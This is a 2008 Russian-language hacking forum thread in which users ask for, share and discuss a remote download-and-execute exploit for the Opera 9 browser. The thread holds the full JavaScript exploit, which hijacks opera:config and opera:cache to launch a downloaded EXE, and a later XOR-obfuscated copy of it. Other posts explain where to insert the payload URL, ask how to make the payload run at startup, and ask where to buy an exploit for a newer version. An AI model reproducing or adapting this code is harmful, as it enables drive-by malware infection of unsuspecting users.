Эксплойты для Opera

Discussion in 'Безопасность и Анонимность' started by -=[AL!EN]=-, 6 Jan 2008.

  1. -=[AL!EN]=-

    -=[AL!EN]=- Elder - Старейшина

    Joined:
    29 Aug 2007
    Messages:
    24
    Likes Received:
    15
    Reputations:
    0
    Прошлую тему удалили модеры (не в том разделе видимо создал)
    Тут его уже выкладывали, но видимо старую тему с ним уже дельнули, ищу еще раз експлоит для оперы 9 версии (remote download & execution)
     
    #1 -=[AL!EN]=-, 6 Jan 2008
    Last edited: 7 Jan 2008
    1 person likes this.
  2. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://milw0rm.com/exploits/3871
    http://milw0rm.com/exploits/3784
    http://milw0rm.com/exploits/3101
     
  3. -=[AL!EN]=-

    -=[AL!EN]=- Elder - Старейшина

    Joined:
    29 Aug 2007
    Messages:
    24
    Likes Received:
    15
    Reputations:
    0
    Спасибо, но к сожалению не то... Насколько помню выкладывали remote dwnld & execution...
     
  4. razzzar

    razzzar Elder - Старейшина

    Joined:
    16 Jun 2007
    Messages:
    92
    Likes Received:
    75
    Reputations:
    5
    Этот?
    Code:
    <script>
    blank_iframe = document.createElement('iframe');
    blank_iframe.src = 'about:blank';
    blank_iframe.setAttribute('id', 'blank_iframe_window');
    blank_iframe.setAttribute('style', 'display:none');
    document.appendChild(blank_iframe);
    blank_iframe_window.eval
    	("config_iframe = document.createElement('iframe');\
    	config_iframe.setAttribute('id', 'config_iframe_window');\
    	config_iframe.src = 'opera:config';\
    	document.appendChild(config_iframe);\
    	app_iframe = document.createElement('script');\
    	cache_iframe = document.createElement('iframe');\
    	app_iframe.src = 'http://path/to/exe';\
    	app_iframe.onload = function ()\
    	{\
    		cache_iframe.src = 'opera:cache';\
    		cache_iframe.onload = function ()\
    		{\
    			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
    			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
    			filename = cache.match(re);\
    			config_iframe_window.eval\
    			(\"\
    			opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
    			app_link = document.createElement('a');\
    			app_link.setAttribute('href', 'tn3270://nothing');\
    			app_link.click();\
    			setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
    			\");\
    		};\
    		document.appendChild(cache_iframe);\
    	};\
    	document.appendChild(app_iframe);");
    </script>
    
     
  5. -=[AL!EN]=-

    -=[AL!EN]=- Elder - Старейшина

    Joined:
    29 Aug 2007
    Messages:
    24
    Likes Received:
    15
    Reputations:
    0
    razzzar
    это для 9й оперы? если да, то большое спс
     
  6. razzzar

    razzzar Elder - Старейшина

    Joined:
    16 Jun 2007
    Messages:
    92
    Likes Received:
    75
    Reputations:
    5
    Да, для 9ой.
     
    1 person likes this.
  7. [ }/{еСтоКий MAN ]

    Joined:
    19 Jan 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    хай. А как юзать этот эксплоит? можно пример?
     
  8. mind

    mind Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    99
    Likes Received:
    25
    Reputations:
    0
    Вот здесь видимо прописать путь к exe файлу:
    Code:
    app_iframe.src = 'http://path/to/exe';\
    
    Не проверял, девятой оперы нема ((
    DrWeb запалил сплоит )))
     
    #8 mind, 19 Jan 2008
    Last edited: 19 Jan 2008
  9. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    сплойт не рабочий его нужно переписать. рабочий в привате.
     
    1 person likes this.
  10. alexman90

    alexman90 Banned

    Joined:
    25 Oct 2007
    Messages:
    80
    Likes Received:
    74
    Reputations:
    -5
    вот .::Gh0st::. сказал что эксплоит скачал калькулятор но не запустил... а можно ли сделать так чтобы скачивалось в автозагрузку??
     
  11. -=[AL!EN]=-

    -=[AL!EN]=- Elder - Старейшина

    Joined:
    29 Aug 2007
    Messages:
    24
    Likes Received:
    15
    Reputations:
    0
    вот мля а я то думаю че то по траффу прогнал ничего не грузанулось :)
     
  12. Mescalin

    Mescalin Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    37
    Likes Received:
    27
    Reputations:
    -8
    у меня этот сплоит норм работал месяца 2 назад тестил на себе опера 9.20 вроде грузил cmd все норм запускал,а потом бац не грузит хз вобщем из за чего это (((
     
  13. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    опера 9.27 sploit

    Тут такой вопрос есть сплоит под эту версию у кого можно его достать или купить и за сколько?
     
    1 person likes this.
  14. m9chik

    m9chik Elder - Старейшина

    Joined:
    20 Jun 2007
    Messages:
    68
    Likes Received:
    56
    Reputations:
    -5
    с чего ты ваще взял что есть сплоит под оперу? и еси 9.27 то большенство юзеров обновляют и очень часто оперу. и сплоит под оперу...ваще впервые слышу :)
     
    1 person likes this.
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Есть под более ранние версии...
     
  16. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    лазию с последней версией браузера у меня увели историю с квипа чел стукнул сам говорит в привате уже сплоит по эту версию есть попался я на ифрейме как он сказал сразу говорю что всякую дрянь я не открываю стоит аутпост который ничего не заподозрил sp3 тоже пробил да и еще нод с последними обновлениями
     
  17. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    ищи плоент в кэше :)
     
  18. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    и как он выглядеть должен?
     
  19. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    PHP:
    <script language=JavaScript>str "cm`oj^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(: cm`oj^hgs`ld/rsb!<!&`cntu;cm`oj&: cm`oj^hgs`ld/rdu@uushctud)&he&-!&cm`oj^hgs`ld^vhoenv&(: cm`oj^hgs`ld/rdu@uushctud)&ruxmd&-!&ehrqm`x;onod&(: enbtldou/`qqdoeBihme)cm`oj^hgs`ld(: cm`oj^hgs`ld^vhoenv/dw`m!)#bnoghf^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] bnoghf^hgs`ld/rdu@uushctud)&he&-!&bnoghf^hgs`ld^vhoenv&(:] bnoghf^hgs`ld/rsb!<!&nqds`;bnoghf&:] enbtldou/`qqdoeBihme)bnoghf^hgs`ld(:] `qq^hgs`ld!<!enbtldou/bsd`udDmdldou)&rbshqu&(:] b`bid^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] `qq^hgs`ld/rsb!<!&&:] `qq^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid^hgs`ld/rsb!<!&nqds`;b`bid&:] b`bid^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid!<!b`bid^hgs`ld/bnoudouEnbtldou/bihmeOnedrZ1\/hoodsIULM/unTqqdsB`rd)(:] w`s!sd!<!odv!SdfDyq)&)NQS]]vz4|/DYD(]]r+]]e*]]r+";str2 "";for (0str.length++) { str2 str2 String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>
    Закриптовано следующее:
    PHP:
    blank_iframe document.createElement('iframe');!blank_iframe.src 'about:blank';!blank_iframe.setAttribute('id''blank_iframe_window');!blank_iframe.setAttribute('style''display:none');!document.appendChild(blank_iframe);!blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\!config_iframe.setAttribute('id', 'config_iframe_window');\!config_iframe.src = 'opera:config';\!document.appendChild(config_iframe);\!app_iframe = document.createElement('script');\!cache_iframe = document.createElement('iframe');\!app_iframe.src = '';\!app_iframe.onload = function ()\!{\!cache_iframe.src = 'opera:cache';\!cache_iframe.onload = function ()\!{\!cache = cache_iframe.contentDocument.childNodes[0.innerHTML.toUpperCase();\!var re = new RegExp('(OPR\\w{5}.EXE)\\s*\\d+\\s*
    вообщем хз, то или не то. что нашел :D

    млин, тупля под вечер. забыл на дату поста посмотреть. все что выше - треш.
     
    #19 oRb, 9 Jun 2008
    Last edited: 9 Jun 2008
  20. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Дай ссылку на зараженную страницу - будет тебе сплойт